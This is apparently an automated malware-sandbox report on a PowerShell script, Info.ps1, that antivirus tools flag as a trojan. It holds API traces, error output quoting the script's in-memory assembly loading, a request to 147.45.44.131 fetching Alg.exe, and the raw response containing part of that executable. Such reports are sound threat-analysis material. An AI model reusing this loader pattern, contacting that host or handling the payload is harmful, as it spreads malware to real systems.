popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Info.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 10, 2024, 5:33 p.m. Aug. 10, 2024, 5:35 p.m.
Size 4.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 2ff0359741c6894d5625d156e0dba750
SHA256 ab8125a8e970c4782f802a76286a40452dca18771a391adbe91a888b3620115a
CRC32 05749C0D
ssdeep 96:i+SqlFtfjqcqtq2qVRiqbqEqMqzb5176zdM1pFzw7g:ipqlFtfjV2TQRi+/RqzV176zdM1Pws
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: '13312 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: mpt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:7 char:47
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:13 char:19
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $entryPoint.Invoke <<<< ($null, $params)
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: eption
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000005f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: f ,ÏĜ(È핤õ¨6o9ÓÎN#@"çÏ:tïŎ;
crypto_handle: 0x003ae110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/Alg.exe
request GET http://147.45.44.131/files/Alg.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02689000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05620000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05621000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02912000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02913000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05446000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06981000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06982000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06983000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06984000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05623000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05624000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05625000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05626000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05448000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05627000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05431000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05631000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Avast Other:Malware-gen [Trj]
AVG Other:Malware-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 08:33:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 06 Aug 2024 22:42:12 GMT ETag: "3400-61f0b812b7b78" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELAe“à" 0*:I `@  `…æHO`Œ€ PH8  H.text@) * `.rsrcŒ`,@@.reloc €2@BIHh)è07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
Data received
Data sent GET /files/Alg.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
host 147.45.44.131
Time & API Arguments Status Return Repeated

send

 buffer: GET /files/Alg.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
socket: 1584
sent: 76
1 76 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 08:33:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 06 Aug 2024 22:42:12 GMT ETag: "3400-61f0b812b7b78" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELAe“à" 0*:I `@  `…æHO`Œ€ PH8  H.text@) * `.rsrcŒ`,@@.reloc €2@BIHh)è07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
received: 2720
socket: 1584
1 2720 0